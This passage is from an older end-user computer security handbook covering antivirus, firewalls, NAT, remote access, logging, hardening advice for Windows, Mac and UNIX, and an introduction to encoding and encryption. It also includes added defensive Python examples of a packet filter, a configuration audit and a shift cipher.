This chapter examines security software packages and ways of increasing the security of networks and computers. Security software packages here means virus scanners, firewalls and remote access tools.

Virus scanners

Virus scanners protect your computer against known viruses, worms and Trojans in the following ways:

• Whenever you insert an external disk into your machine, they check it for possible viruses.
• Whenever an e-mail is received, the message itself and its attachments are checked to make sure they are free of any kind of virus.
• Whenever a file is downloaded from a website, it is checked.
• In most cases, when a web page and the software embedded in it are downloaded to your computer, they are checked.
• Whenever you access a file, or copy, save, move, open or close it, they prevent viruses from harming the system.
• Using these programs you can check a single file, a set of files, or all the available disks for viruses.
• If a virus, worm or Trojan is detected, the tool removes it or, if it cannot do so, informs you that the problem cannot be fixed; it then quarantines the damaged file and so prevents harm to other parts of the file system.

Rule 20: Antivirus software must be installed on every computer that is vulnerable to viruses and must be updated every day. The machine must also be fully scanned for viruses at regular intervals.

Rule 21: For computers that are not affected by viruses (such as Unix-based systems), make sure that outgoing e-mail does not contain a virus, so that the recipient is not harmed either.

Rule 22: Keep your operating systems and important applications up to date, and remember that virus scanners only check for viruses that attack files, whereas vulnerabilities in operating systems and applications may cause the system to be harmed in other ways.

A virus scanner with up-to-date virus signatures (a "signature" is a particular characteristic of a virus by which the scanner can recognize the type of virus) is one of the most important parts of any network that can be connected to the Internet. Note that viruses for the UNIX environment have only recently begun to spread, but worms and Trojans have existed for that environment for a long time.

By late August 2003 one antivirus product for personal computers and the Macintosh (Norton AntiVirus) could identify roughly 65,000 different viruses. August 2003 was an interesting month for the release of malicious software, because many of the worms released that month exploited a highly critical vulnerability in the Windows operating system (Blaster and SoBig were among the most widespread). Microsoft had released a patch for it a month earlier, but few people had installed it, and for that reason the new worms were able to damage a large number of machines and spread through them quickly, to the point that new records may well have been set. On the busiest day of that month, the Norton scanner added about 50 new virus signatures to its list of detectable viruses. A month later that number had reached about 520.
Firewalls

A firewall inspects all activity into or out of the network and, on the basis of the set of rules it holds, either allows traffic (meaning the information exchanged over the network) to pass or stops it. A firewall can be installed as a program on the computer, or it can be a piece of equipment between the computer (or a group of computers) and its network connection. Sometimes the firewall is built into other equipment such as routers. Firewalls of this kind are usually free and pre-installed, and they are present in many operating systems.

Rule 23: Every computer must be protected by a firewall, which can be installed as software on each computer or placed as a hardware firewall in front of the whole local network.

To understand what a firewall does and how rules can be set up to control it, you also need to grasp the concept of the TCP/IP protocol, the set of rules that governs all messages sent over the Internet. If you are familiar with TCP/IP you can go on to the next section, but if you do not know it, first read Appendix 2 of this Part. Note that even if you do not want to learn these details you can still use a firewall. Everything you need to know about TCP/IP is summarized below:

• Machines connected to the Internet have an IP address of the form 12.222.103.43 which, as you can see, consists of four separate numbers. The Internet uses this address to route messages, and each computer indicates where messages are to be sent by giving the destination address in this format.
• On each machine, different programs are identified by a port number (like internal extensions in large companies: there is only one public telephone number, but each room has its own extension).
• The pieces of information sent to or from a computer are called packets.
• Ignore the words TCP and UDP in the discussion below, and do not worry much about missing the details.

Why do we need a firewall?

If your computer is not connected to a local network or to the Internet, you do not need a firewall. As soon as you connect to a network, it becomes possible for attackers to misuse your computer. For example:

• If you use file sharing, printer sharing or other computer services, your computer waits on particular ports (the computer is said to "listen" on that port). Although this lets you share your resources with another computer, a computer anywhere else in the world may also be able to see your information.
• If you can listen on the file sharing ports, then because of bugs someone may be able to send you a cleverly crafted message and through it carry out damaging actions on your computer. Unfortunately this kind of attack has now become very common.
• Even if you are not listening for messages on any port, other computers can still send you large numbers of messages. Although they can all be ignored, the messages can clog your network connection and stop you from doing your work (in this case only hardware firewalls can help you).
• If, despite all your efforts, you are infected by a virus, worm or Trojan, all the information on the computer may be sent to the author of the malicious software. This includes data and everything that has been entered on the victim computer (including passwords).

How do firewalls work?

A firewall monitors all the packets sent to your computer and checks whether they conflict with the configured rules. If they do, the packets are blocked. On both software and hardware firewalls it is best to implement the following rules:

• Do not allow any packet through on ports 135, 137, 139 and 445 (TCP/UDP). These ports are used for the file sharing service and other kinds of Windows services. By stopping these packets you can be sure that nobody on the Internet can connect to your computer to use these services.
• Do not allow any packet through on ports 135, 137, 139 and 445 (TCP/UDP) unless its source IP address belongs to one of the computers whose services you wish to use.
• You can define for the firewall a list of trusted computers that will not harm the network, so that only trusted computers can connect to you. With this in place you can still communicate with other computers, such as web servers on the Internet, but you must be the one who initiates the connection.

Software firewalls use the computer's own resources, but they have the advantage that they do not examine only the content of the information (together with the addresses and ports of its sender or receiver); they can also check which program sent the message. If an unauthorized program has established a connection with your computer, the firewall can ask your permission before letting it through. A hardware firewall cannot tell which program was used to send the message, but since it is a separate piece of hardware it does not slow the computer down.

Whether you have a hardware or a software firewall, you must always keep it up to date, as with all other security equipment. Attackers are very creative, so it is very important that the tools you use to protect your system are current.

Private address spaces

The Internet was originally designed so that every computer or device on it had its own address, and therefore every computer could communicate with every other. Today, for many reasons, global connectivity at this level is not particularly desirable. There are two main reasons for this:

• Sometimes you want to keep a group of computers separate from the rest so that they cannot communicate directly with other computers on the Internet. This is the case for the computers of some public and private organizations.
• Because IP addresses are allocated across the Internet, your organization may not have enough IP addresses to assign one to every machine. This problem often arises in developing countries, where the national Internet came into being several years after the communication networks of the developed countries were created.

There are particular IP addresses that are not used on the Internet. These addresses are called "private address spaces" and can be used in the two cases mentioned. Since computers that use private address spaces do not communicate directly with the Internet, they do not need unique addresses. Although different organizations may use the same set of addresses, none of them can see the others, and so these identical addresses cause no problem.

• Proxy servers can also be used with ordinary IP addresses. They are used to control the type of Internet traffic passing through or to ease communication between the user and the network. A web proxy server keeps a copy of the pages that have been requested, and if another user requests the same page it sends him the stored copies; in this way the Internet bandwidth required is reduced. This mechanism is called caching.
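The three rules listed under "How do firewalls work?" can be expressed as a small packet filter. The following is an added example, not part of the handbook: the `Firewall` class, the packet fields and all addresses are constructed for illustration, and it assumes that any inbound packet that is neither from a trusted computer nor a reply to a connection you started is blocked.

```python
"""Packet filter implementing the handbook's rules for Windows service ports.
Addresses and packets below are constructed sample values."""
import ipaddress
from collections import namedtuple

Packet = namedtuple("Packet", "proto src_ip src_port dst_ip dst_port")

WINDOWS_SERVICE_PORTS = {135, 137, 139, 445}   # ports named in the text (TCP and UDP)


class Firewall:
    def __init__(self, trusted_sources=()):
        # Trusted computers may be given as single addresses or as networks.
        self.trusted = [ipaddress.ip_network(t, strict=False) for t in trusted_sources]
        self.flows = set()      # connections this computer started
        self.log = []           # one entry per blocked packet

    def _is_trusted(self, ip):
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in self.trusted)

    def outbound(self, pkt):
        """Record a connection we initiate so that its replies are let back in."""
        self.flows.add((pkt.proto, pkt.dst_ip, pkt.dst_port, pkt.src_port))
        return "ALLOW"

    def inbound(self, pkt):
        """Decide on a packet arriving from the network."""
        if pkt.proto in ("tcp", "udp") and pkt.dst_port in WINDOWS_SERVICE_PORTS:
            # Rules 1 and 2: blocked unless the source is a trusted computer.
            if self._is_trusted(pkt.src_ip):
                return "ALLOW"
            return self._block(pkt, "Windows service port from untrusted source")
        if (pkt.proto, pkt.src_ip, pkt.src_port, pkt.dst_port) in self.flows:
            return "ALLOW"      # rule 3: reply to a connection we started
        if self._is_trusted(pkt.src_ip):
            return "ALLOW"      # rule 3: trusted computers may connect to us
        return self._block(pkt, "unsolicited inbound packet")

    def _block(self, pkt, reason):
        self.log.append(f"BLOCK {pkt.proto} {pkt.src_ip}:{pkt.src_port} -> "
                        f"{pkt.dst_ip}:{pkt.dst_port} ({reason})")
        return "BLOCK"


def demo():
    """Run five constructed packets through the filter; return decisions and the block log."""
    me = "192.168.1.20"
    fw = Firewall(trusted_sources=["192.168.1.10"])          # a trusted file server
    fw.outbound(Packet("tcp", me, 51000, "203.0.113.80", 80))  # we open a web page
    arriving = [
        Packet("tcp", "198.51.100.7", 40000, me, 445),   # stranger probing file sharing
        Packet("udp", "198.51.100.7", 137, me, 137),     # stranger, NetBIOS name service
        Packet("tcp", "192.168.1.10", 50000, me, 445),   # trusted file server
        Packet("tcp", "203.0.113.80", 80, me, 51000),    # reply to our web request
        Packet("tcp", "203.0.113.80", 80, me, 52000),    # same server, but unsolicited
    ]
    return [fw.inbound(p) for p in arriving], fw.log


if __name__ == "__main__":
    decisions, log = demo()
    print(decisions)
    print("\n".join(log))
```

The `log` list corresponds to the kind of entry the handbook later describes under event logging, where the firewall records that it identified and blocked an unauthorized connection.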
There are two methods by which a computer with a private address can communicate with the Internet:

• Proxy servers. A proxy server is a special kind of firewall. It has an address in the private address space but also has a second connection and address for connecting to the Internet. If a user wants to connect to the Internet from a machine whose address is in the private space, he sends his message to the proxy server and asks it to deliver the message to the intended destination on the Internet. The proxy server keeps a record of the request after sending it out on the Internet, and when the reply comes back it returns it to the machine that made the request.
• NAT (Network Address Translation). NAT sits between the local network and the Internet and, like a proxy server, is connected both to the Internet and to the local network in which private IP addresses are used. When a message is sent from the local network to the Internet through NAT, NAT sends it using its own IP address and makes it appear that the message was sent from a port that is not in use; when the reply is received, it is passed back to the original computer on the local network. NAT works like a proxy server, but it is used for all kinds of traffic (not only web traffic) and does not use caching.

Proxy servers and NAT are both like firewalls, and they protect the machines that sit in private address spaces against all kinds of outside attacks.

Remote access, management and administration tools

Remote access tools, remote management tools and remote administration tools make it possible to control your computer remotely over a telephone line or the Internet. When you connect to your computer this way, it is as if you were sitting at its keyboard.

Rule 24: If you use remote access facilities to control computers, make sure that they are adequately secured (with appropriate usernames and passwords), so that attackers cannot use these tools against you.

Remote access tools have many important uses. Among them are the following:

• When you do not have physical access to your office computer, they make it possible for you to use it. You can thereby reach the data, applications and network services of your workplace.
• They let you show your computer to a specialist for examination without bringing him to your workplace.
• Many people will be able to use applications that are installed on only one machine.
• System support staff can use them to manage several servers easily.

Remote access tools also make it possible for attackers to do everything just mentioned. In fact there is little functional difference between remote access tools used for the purposes above (such as pcAnywhere) and the backdoors of Trojans (such as Back Orifice or NetBus).

Malware detectors

Suppose you keep your software up to date, scan for viruses and check the files you receive, use strong usernames and passwords, and also use an appropriate firewall to protect your system. If you are then asked whether, with all of this, you are completely safe, the answer "yes" still cannot be given with one hundred percent confidence. There is always the possibility that you will be harmed by a flaw before a fix for that flaw has been made available. You may also from time to time do something that cannot be regarded as completely safe.

"Malware detectors" are programs that examine your computer to find suspicious programs, regardless of how they were installed. Their function sometimes overlaps with that of virus scanners, because both identify malicious software present on the disk and check that key system programs have not been secretly altered.

These detectors check browser plug-ins and add-ons and identify anything that harms your system or violates privacy rules. Some of these programs also include tools for removing the malware they have identified.

Event logging

Event log files are a useful tool for safeguarding the security of your computer, but they usually do not receive much attention. Log files are kept on disk, and programs can write messages to them. A message is usually written when an event occurs or a problem arises.

Rule 25: Event logging for system functions and applications must be properly enabled.

Examples of events that can be logged are:

• the computer was switched on;
• someone logged in to the system;
• someone tried to log in to the system but his password was wrong;
• an e-mail was received;
• an e-mail was about to be sent but the connection was lost;
• many errors occurred on the disk (or the network connection);
• the firewall identified an unauthorized connection and blocked it;
• the virus scanner automatically downloaded a new set of virus signatures;
• a virus scanner checked all the files on the system and identified a virus.

Depending on the program and the system it runs on, log files may be deleted once they have grown large, or a new log file may be created every so often while older files are kept for later examination (usually part of the log file's name contains a date).

In general there is a separate log file for each system and application. Sometimes you can read the file with a text editor, and sometimes you will need special tools to read and format the files.

Logs are very useful and in general should be enabled. At the same time you must take care not to enable them for routine, everyday activities, because the system then has to spend a lot of time writing and checking them, and they also take up disk space.
If you know what the detailed entries in the log files show, review them periodically to see whether anything unusual has happened. Otherwise, logs should be kept in such a way that, if abnormal events occur, they can provide guidance for discovering more precisely what happened.

Chapter 8
Platform-Specific Notes

Windows-based personal computers

Strengths and weaknesses

The Windows operating system on the Intel x86 processor (or its equivalents) is the most common computer system ever designed. The capabilities of this operating system and its applications are very attractive from a user's point of view, and a large amount of commercial software, shareware and free software is available for it. Although, as with any other system, real experts are hard to find, there are many specialists with an acceptable level of knowledge for working with these systems. Many competitors also compete on the hardware side, which has led to product variety and relatively low prices.

Everything in this book applies to Windows systems, and users who are concerned about security should take all of the recommendations seriously.

Windows does not have a particularly good standing in terms of security. The operating system kernel was not designed with network security in mind, and although newer versions (Windows 2000, Windows XP, ...) have addressed many of these issues, the necessary level of security is still lacking, and the recent changes have done little for users of older systems. Until recently Microsoft paid little attention to security. This has now changed, particularly as the company has turned its attention to flaws in multimedia software and other vulnerabilities of its operating systems.

Extended functionality in systems and software usually raises the cost of securing them. In many cases, to make the tools easier for novice users, systems have been given several subsystems and a great many features, which has made them vulnerable. Because of the large number of vulnerabilities and the number of computers in use, tens of thousands of Windows-based personal computers became prime targets for programmers who spread malware such as viruses, worms and Trojans. The graphical user interfaces in Windows are very user-friendly, and millions of people with little technical knowledge are now able to use them. This user-oriented approach, combined with the vulnerabilities mentioned, makes Windows-based systems prone to security problems.

How to protect yourself

Software releases
If you have sufficient bandwidth, use the Microsoft update site (http://windowsupdate.microsoft.com) to keep your operating system current with the latest Service Packs. Otherwise, apply the security patches released for updating Windows (these patches take less bandwidth than Service Packs).

If updating through the Microsoft update site is not possible for you, you can obtain the update packages from the Microsoft download center (http://www.microsoft.com/downloads).

Your ISP or other service providers may be able to download the released updates and distribute them on CD. Although this requires considerable resources, a tool for managing Windows updates, in the form of a service called Software Update Services for Windows 2000, is available at:
http://www.microsoft.com/windows2000/windowsupdate/sus/

User accounts
On Windows NT, Windows 2000 and Windows XP systems, which support multiple users, make sure that no unnecessary user accounts have been created. In addition, make sure that all users have chosen an appropriate password, as explained in Chapter 3 of this Part. Users should be given only the privileges they need. For example, even if a machine is administered solely by its main user, that user should not use administrative privileges for routine, everyday work.

File sharing
If you do not use file sharing or print sharing, make sure they are disabled. The steps for doing this are available in Windows Help and on the Microsoft support site. Search for the phrase "disable file sharing xx", where xx is the version of your operating system, for example XP or 2000. If you do use file sharing, make sure that no unnecessary privileges are enabled in it.

File system
The FAT and FAT32 file systems used in Windows are not fully secure, especially if you use file sharing. If files are accessed over the network, the NTFS file system should be used where possible. Note that where your computer can be booted with more than one operating system, or where you need to access the hard disk from another operating system, you cannot use NTFS.

System services
On some systems all network capabilities are enabled so that communication between computers can be established easily. If you have no network in your company, disable the services that are not used.

Firewall
Install a hardware or software firewall on your system. Free versions of this software are available. Keep the firewall up to date. Make sure the firewall is configured to alert you when any unusual event occurs.

Antivirus
Also install antivirus software on your machine. If you cannot find a free version, you will have to pay for a commercial one. Some vendors stress daily updates of their antivirus products and others suggest weekly updates. Naturally, the more up to date your software is, the better it can protect the system.

Malware detectors
There are programs that search the system for various kinds of malicious software, such as:

Pest Patrol (http://www.pestpatrol.com)
Lavasoft (http://lavasoftusa.com/software/adawareplus/)
SpybotSD (http://www.safer-networking.org)

All of the above programs are free and identify different kinds of malicious software on the system.

Security summary review
If you are a non-technical user and there is no organization to help you, you can look at Microsoft's suggestions for home users:
http://www.microsoft.com/security/home
http://www.microsoft.com/protect/

If you are an information technology specialist, you can use this site:
http://www.microsoft.com/technet/security

If you have a new system, you can install and run MBSA (Microsoft Baseline Security Analyzer) on it; MBSA is designed to provide support services for Windows 2000 and Windows XP systems.

Macintosh computers

Strengths and weaknesses

Apple Macintosh computers and their operating system are less susceptible to security problems than Windows personal computers. In addition, because Macs have fewer users than PCs, attackers show less interest in sabotaging them. Perhaps their greatest vulnerability is that Mac users imagine they are always safe and will never be troubled by anyone. MacOS systems that predate MacOS X had a more suitable operating system. MacOS X is based on FreeBSD UNIX and should be regarded as a particular UNIX system designed with appropriate security considerations (this is discussed in the next section, on UNIX). Numerous system services are built into the core of MacOS X, but all of them are disabled.

How to protect yourself

Software releases
Make sure you have applied all patches to protect the system. Go to http://www.apple.com and click Support. As with Windows systems, your unpatched system may be compromised after only a few hours or days, especially if it has a permanent network connection.

User accounts
Make sure that all user accounts that are not needed are disabled or deleted. In particular, check that the guest account is not active without a password. Limit administrative privileges for the accounts you use a lot, and do not use the administrator account for everyday tasks that can be done without administrative privileges.

File sharing
If you do not use this feature, disable it. Otherwise, make sure that the assigned privileges are at the lowest possible level.

Services
Disable the services that are not needed. If you enable them temporarily, remember to disable them all again when you have finished.

New applications
New network-related applications (especially those designed for UNIX) may be vulnerable on systems designed before MacOS X. If you have installed such software, keep this in mind.

Firewall
Install a hardware or software firewall on your system and keep it up to date. Make sure the firewall is configured to alert you when any unusual event occurs.

Antivirus
Also install antivirus software on your machine. If you cannot find a free version, you will have to pay for a commercial one. Some vendors stress daily updates of their antivirus products and others suggest weekly updates. Naturally, the more up to date your software is, the better it can protect the system.

UNIX, Linux, and similar systems

Strengths and weaknesses

From their inception, Unix systems were used in computer science and physical science environments as workstations and servers (both for system services and for multi-user computing), and over the past decade they have to some extent overtaken Windows and Macintosh systems, which were single-user workstations in other environments. With the growing popularity of Linux this trend spread, because on the one hand the system was very interesting and attractive, and on the other, unlike Windows, its source code was made freely available to the public. This drew more attention in developing countries than in developed ones, because in developing countries the cost of acquiring software is much higher relative to average income. Among the strengths of UNIX are its flexibility and the software that users and companies have produced for it over the years.

Unfortunately, the power and flexibility of UNIX have not been accompanied by user-friendliness (from a novice user's point of view). As a result, when these systems are used as workstations by users who are not UNIX specialists, strong staff are needed to support them. In any case, the foundations of the system are still complex, and an inexperienced, novice user is quite likely to leave the way open for a security breach. Although UNIX systems are relatively free of viruses, they are susceptible to the latest worms and Trojans, so these remain among their potential problems.
How to protect yourself

All of the topics covered in the previous 7 chapters also apply to UNIX, Linux and similar systems, and you must address them if you want your computer to be reasonably secure. This section concentrates on single-user workstations. Those responsible for servers should read Part Five of this book.

Different flavors of UNIX
Because there are many different UNIX-like operating systems, many vendors have their own pre-installed security mechanisms. It is therefore very important to read the practical guide for the version of Unix you use. The names of several useful books, web sites and mailing lists devoted to Unix security are given in the appendices of this book.

Software releases
Software must be kept up to date, and all security patches must be installed promptly. The details of where to obtain an update package and how to apply it differ from system to system.

User accounts
The root user (uid 0) has the highest level of access and can usually change every aspect of the system. For this reason, protecting the root account and the processes that can be run by it is one of the most important aspects of UNIX security. Avoid using the root account for everyday activities and, for extra assurance, disable logging in to the system with the root account. When you must use this account, use the su (superuser) command (or alternatives such as sudo) to switch the account in use to root.

If there is more than one user on the system, use access control lists to restrict users' access.

Wherever possible, run network services under an account other than root.

Never unpack or compile new software with the root account. Software is usually compiled in an environment that you enter with chroot, so as to protect you against various kinds of Trojans.

Mounting disks that are accessed remotely
If you use any of the various remote access methods to reach a disk remotely (from personal computers or UNIX systems), set appropriate passwords for this and, where possible, restrict access to the files that the software needs to no more than is required.

System services
Many UNIX machines come with extensive system services, such as an FTP server, a web server and an e-mail server. In many cases these services are enabled by default. Disable all network-based services that are not used. Some people think that because these services exist they should be used, even if they lack the technical expertise to manage their security. This is a serious mistake; these services should not be running on user workstations without a convincing reason and adequate technical support.

Many network services are started by the inetd or xinetd command. Check the configuration files used by this daemon and disable every service you do not need. Other network services that start when the system boots are found in files under /etc/init.d or /etc/rc*.d, or in /etc/rc and /etc/rc.local. Pay special attention to services that may disclose information about the system or its users to others, such as fingerd.

If you have set up an anonymous FTP service, be sure to keep it up to date. Never exchange the /etc/passwd file through the FTP area. Make sure that the accounts root, uucp, bin and any other accounts that do not belong to a particular user are listed in /etc/ftpusers, which contains the list of users who may not use FTP. Be careful about directory permissions and ownership in the FTP area. Prevent downloads through incoming directories and uploads through outgoing directories, and finally, review the logs of your FTP service regularly.

Firewall
Every UNIX system should run its own host-based firewall for packet filtering. Use the vendor's documentation to determine whether your system has a firewall and, if so, how it can be used for this purpose. Firewall configuration tools usually include ipfw, ipchains and iptables. These firewalls should be configured to block all packets by default and to let through only those destined for the services you have chosen to offer.

Default user accounts
Many Unix systems have several default user accounts that are used for separate processes or for file ownership, such as bin, daemon, uucp and so on. Make sure that the encrypted passwords of all of these accounts begin with "*", so that no password can be used to access them. It is enough for the root account to have a valid password; nobody needs to be able to log in to the other accounts (although, if necessary, the root account can reach the other accounts with the su command).

Malware detectors
There are many tools that point out malicious software to the Unix administrator. One of the oldest is Tripwire, which checks whether important system software and other critical files have been secretly modified.
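The account, FTP and inetd checks described in this section can be collected into one script; the following is an added example, not part of the handbook. The sample file contents, the function names and the choice of finger as the only flagged information-leaking service are assumptions of this example.

```python
"""Added example: the UNIX workstation checks above, run over sample files.

Every file body here is a constructed sample. On a real host the same
functions would be fed /etc/passwd, /etc/shadow, /etc/ftpusers and
/etc/inetd.conf.
"""

SERVICE_ACCOUNTS = ("bin", "daemon", "uucp")   # non-personal accounts named in the text
FTP_DENY_REQUIRED = ("root", "uucp", "bin")    # accounts the text wants in ftpusers
INFO_LEAK_SERVICES = ("finger",)               # fingerd is the text's example

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
bin:*:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/sh
"""
SAMPLE_SHADOW = """\
root:$6$constructed$hash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
uucp::19000:0:99999:7:::
alice:$6$constructed$hash:19000:0:99999:7:::
"""
SAMPLE_FTPUSERS = "root\nbin\n"
SAMPLE_INETD = """\
# constructed inetd.conf sample
ftp     stream  tcp  nowait  root    /usr/sbin/in.ftpd     in.ftpd -l
#telnet stream  tcp  nowait  root    /usr/sbin/in.telnetd  in.telnetd
finger  stream  tcp  nowait  nobody  /usr/sbin/in.fingerd  in.fingerd
"""


def _records(text):
    """Yield colon-separated fields for each non-blank, non-comment line."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            yield line.split(":")


def loginable_service_accounts(passwd_text, shadow_text="", lock_prefixes=("*",)):
    """Service accounts whose password field does not start with a lock marker.

    "*" is the marker the text names; some systems also use "!".
    """
    shadow = {f[0]: f[1] for f in _records(shadow_text) if len(f) > 1}
    findings = []
    for fields in _records(passwd_text):
        if len(fields) < 2 or fields[0] not in SERVICE_ACCOUNTS:
            continue
        name, password = fields[0], fields[1]
        if password == "x":                 # real hash is kept in the shadow file
            password = shadow.get(name, "")
        if not password.startswith(tuple(lock_prefixes)):
            findings.append(name)           # empty or real hash: review it
    return findings


def missing_ftp_denials(ftpusers_text):
    """Required accounts that are absent from an ftpusers body."""
    listed = {fields[0] for fields in _records(ftpusers_text)}
    return [name for name in FTP_DENY_REQUIRED if name not in listed]


def enabled_inetd_services(inetd_text):
    """(service, run-as user) for each active line of an inetd.conf body."""
    active = []
    for line in inetd_text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) >= 6:     # service type proto wait user program [args]
            active.append((parts[0], parts[4]))
    return active


def audit(passwd, shadow, ftpusers, inetd):
    """Run all checks and return the findings by category."""
    services = enabled_inetd_services(inetd)
    return {
        "service_accounts_not_locked": loginable_service_accounts(passwd, shadow),
        "missing_from_ftpusers": missing_ftp_denials(ftpusers),
        "inetd_services_enabled": [name for name, _ in services],
        "inetd_services_as_root": [name for name, user in services if user == "root"],
        "information_leaking_services": [n for n, _ in services if n in INFO_LEAK_SERVICES],
    }


if __name__ == "__main__":
    report = audit(SAMPLE_PASSWD, SAMPLE_SHADOW, SAMPLE_FTPUSERS, SAMPLE_INETD)
    for check, result in report.items():
        print(f"{check}: {result}")
```

Each enabled inetd service in the report is one to justify or disable, in line with the advice above to switch off every network service that is not used.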
Appendix 1
Introduction to Encoding and Encryption

Encoding and encryption are techniques that transform strings of characters into a different format and shape. In the computer world, encoding is a transformation that changes the appearance of a message so that the result meets particular criteria; encryption is also a kind of transformation, used to hide the content of the message.

Encoding

Encoding changes the format of an object so that it satisfies certain criteria. The process is reversible: the encoded form can later be decoded to recover its original form.

The encoding process

Suppose you want to send a message that is an ordinary English sentence:

Security is important.

There is a restriction on sending, however: you can only send decimal digits: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9. So we must devise a mapping function that can convert what we want to send into decimal digits and, after sending, convert it back to its previous form.

For this purpose we use a set of simple rules:

For A we put 01;
For B we put 02;
For C we put 03;
For D we put 04;
...
For X we put 24;
For Y we put 25;
For Z we put 26;
For a space we put 27;
For a period we put 28.

Take the original sentence and replace each letter with its assigned code. Put 19 for S; put 05 for E; put 03 for C; and so on.

Now we can send the string like this:

19050321180920252709192709131615182001142028

If we put spaces between the numbers it becomes more readable:

19 05 03 21 18 09 20 25 27 09 19 27 09 13 16 15 18 20 01 14 20 28

When the message is received, the recipient restores it to its original state: S replaces 19; E replaces 05; C replaces 03, and this continues until the original sentence is obtained.

Uses of encoding

The main use of encoding that we discuss here is in the transfer of e-mail attachments. E-mail was originally designed for sending English-language text, and the design was based on the ASCII code, which had 128 unique characters. These codes were used to represent the 26 letters of the English alphabet in lower and upper case, the 10 digits, some other symbols such as the comma, period and bracket, and a number of control keys such as Tab and End.

Many languages, however, have more characters than English. In addition, programs, word-processing files, pictures and other kinds of files are made up of 8-bit bytes, giving 256 unique characters in all, and none of these can be sent by e-mail.

To solve this problem the concept of attachments was introduced, in which a file sent along with an e-mail is first encoded so that its content takes the form of standard ASCII characters. This is the same kind of process as the one by which we encoded the sentence above using only digits. As in that example, the encoded message is longer than the original, but it can be transferred without any particular problem and, once received, decoded back to its original form.

Unicode

Unicode is an encoding scheme for all the characters used in common languages, which computers can use in a uniform way. More detail, as agreed by the Unicode Consortium (http://www.unicode.org), is summarized below:

Fundamentally, computers deal with numbers. They store letters and other characters by assigning a number to each one. Before Unicode there were hundreds of different encoding systems for these conversions, but none of them supported enough letters and symbols; the European Union alone, for example, needed several different encodings to cover all the European languages. Even for a single language such as English, no single encoding was adequate for all the letters, punctuation marks and technical symbols.

The different encoding systems were also incompatible with one another: two encoding systems could use the same number for two different characters, or use two different numbers for the same character. Every computer (especially servers) has to support several different encoding systems. Whenever data is exchanged between different encoding systems, it may be corrupted. Unicode was created to solve all of these problems.

Unicode assigns a separate number to every character, no matter what the platform, program or language. The Unicode standard has been finalized under the leadership of companies such as Apple, HP, IBM, JustSystem, Microsoft, Oracle, SAP, Sun, Sybase, Unisys and others, and is a fixed standard on all platforms.

Encryption

Encryption resembles encoding in that text or other objects are transformed into a different format. The purpose here is to hide the content of the message.

There are three different methods of encryption:

• Symmetric encryption
• Public key encryption
• One-way encryption using a hash

Symmetric encryption

Put simply, symmetric encryption resembles encoding in that all the original characters of the text change their appearance. One of the simplest encryption algorithms is to replace each letter with the letter that follows it. In this method:

B takes the place of A;
C takes the place of B;
D takes the place of C;
...
Y takes the place of X;
Z takes the place of Y;
A takes the place of Z (at the end of the alphabet we return to the first letter).

If we use this algorithm, the example above becomes (ignoring the spaces and the period):

TFDVSJUZ JT JNQPSUBOU.
The message has now been changed. The recipient reverses the process, replacing each letter with the one before it, and so obtains the original sentence.

Instead of shifting each letter by one position, we can shift the letters by several positions. As long as the recipient knows the size of the shift, the message can be decrypted.

The number of positions by which a letter is shifted is called the encryption key. This number is used both to encrypt the message and to decrypt it. Julius Caesar used this method to send his confidential and secret messages (he chose the number 3 as his encryption and decryption key).

With this simple algorithm, if your message is stolen and the thief grasps the general idea of the encryption, the content may be worked out by guessing. If the algorithm is too complex to be found by trying a few shifts, decryption becomes far more difficult. Until some time ago, many encryption algorithms used this simple shifting method.

Today, mathematical formulas are used for encryption instead of shifting letters. We still use a key, and the key is part of the formula that performs the encryption. To decrypt a message you must use a key. If you do not have the right key, you can try other keys until you reach the answer. If the key is limited to the numbers 1 to 10, guessing does not take long. If, for example, it lies between 1 and 100, it may take a little longer. Today keys are usually 128-bit binary numbers. That is approximately

340,000,000,000,000,000,000,000,000,000,000,000,000

different choices, which makes guessing the correct key practically impossible.

Symmetric encryption is used when the sender and the recipient can use the same key (in which case they must have agreed on a particular key). This method is used to encrypt a message when you want to move information from one place to another, for example over wireless links, or when you want to encrypt the information on a disk so that others cannot read it. In the latter cases, if the key is lost, your information is certainly lost as well.

Public key encryption

This kind of encryption is similar to symmetric encryption, with one major difference: instead of one key, there are two. The key used to encrypt the message is different from the key used to decrypt the encrypted message. The first key is usually public, and everyone is allowed to know it. If you want to send someone a private message, you must use that person's public key, which the person has made available to everyone for encryption. Decrypting the message requires the person's private key, which is different from the public key and must never be given to anyone else. It follows that if your message is sent to someone using this mechanism, nobody other than the true recipient can read it.

Note that with this method the recipient cannot be sure who sent the message, because anyone may have the recipient's public key. The sender, however, can be sure that only the owner of that public key (the key used for encryption) can decrypt and read the message with the corresponding private key.

Public and private keys can also be used the other way round. In that case you encrypt the message with your private key, and anyone who has your public key can decrypt it. What this proves is that the sender of the message can be nobody but you.
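Going back to the two-digit encoding and the letter-shift cipher from earlier in this appendix, the added example below (not from the handbook) implements both on the same sentence and shows why the size of the key space matters. The function names are this example's own, and since the table has no lower-case codes, text is upper-cased first.

```python
"""Added example: the appendix's encoding table next to its shift cipher."""
import string

ALPHABET = string.ascii_uppercase
# The appendix's table: A=01 ... Z=26, space=27, period=28.
CODE_TABLE = {ch: f"{i:02d}" for i, ch in enumerate(ALPHABET + " .", start=1)}
DECODE_TABLE = {code: ch for ch, code in CODE_TABLE.items()}


def encode_digits(text):
    """Encoding: a public, keyless mapping so the text fits a digits-only channel."""
    try:
        return "".join(CODE_TABLE[ch] for ch in text.upper())
    except KeyError as exc:
        raise ValueError(f"no code assigned to {exc.args[0]!r}") from None


def decode_digits(digits):
    """Reverse the mapping; anyone who knows the table can do this."""
    if len(digits) % 2:
        raise ValueError("digit string must have an even length")
    try:
        return "".join(DECODE_TABLE[digits[i:i + 2]] for i in range(0, len(digits), 2))
    except KeyError as exc:
        raise ValueError(f"unknown code {exc.args[0]!r}") from None


def shift_encrypt(text, key):
    """Symmetric shift cipher: key is the number of positions each letter moves."""
    shifted = []
    for ch in text.upper():
        if ch in ALPHABET:
            ch = ALPHABET[(ALPHABET.index(ch) + key) % 26]
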